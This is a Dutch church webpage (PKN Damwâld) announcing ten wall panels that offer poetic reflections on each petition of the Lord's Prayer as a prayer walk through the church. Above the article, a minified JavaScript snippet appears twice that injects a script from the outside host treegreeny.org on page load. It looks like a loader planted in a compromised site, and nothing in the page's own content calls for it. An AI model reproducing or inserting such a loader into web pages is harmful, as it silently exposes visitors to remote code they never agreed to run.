;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gebedsweg van het Onze Vader - PKN Damwâld

Gebedsweg van het Onze Vader

Gepubliceerd op: dinsdag 11 april 2023

Sinds kort zijn er een tiental panelen aan de muren zijn bevestigd waarop van elke bede uit het Onze Vader in dichtvorm enkele gedachten zijn uitgewerkt.
Het Onze Vader is wel het meest universele gebed wat al zo’n 2000 jaar over de hele wereld gebruikt wordt. In kerken maar juist ook thuis, veelal bij het begin van de maaltijd. We kennen het van jongsaf aan. Maar laten we eerlijk bekennen; omdat we het zo vaak gebruiken is de kans aanwezig dat we de intensie van elke bede niet altijd goed in gedachten hebben.
Het gebed kenmerkt zich door het noemen van praktische aangelegenheden. Neem als voorbeeld de bede: “Geef ons heden ons dagelijks brood.” Bij deze bede mogen we toch beseffen dat hier niet alleen voor ons “brood op de plank” bedoeld wordt.
Zo heb ik getracht om als het ware bij elke bede even kort stil te staan. Wat valt me in? Waar mag ik aan denken? Het eerste gedeelte geeft weer waar we in ons dagelijks leven tegen aan lopen met elke bede. Het tweede gedeelte is een aarzelend zoeken wat we van God mogen/kunnen verwachten.
De panelen nodigen uit om al wandelend door de kerk (gebedsweg) er kennis van te nemen.

Pieter van den Broeke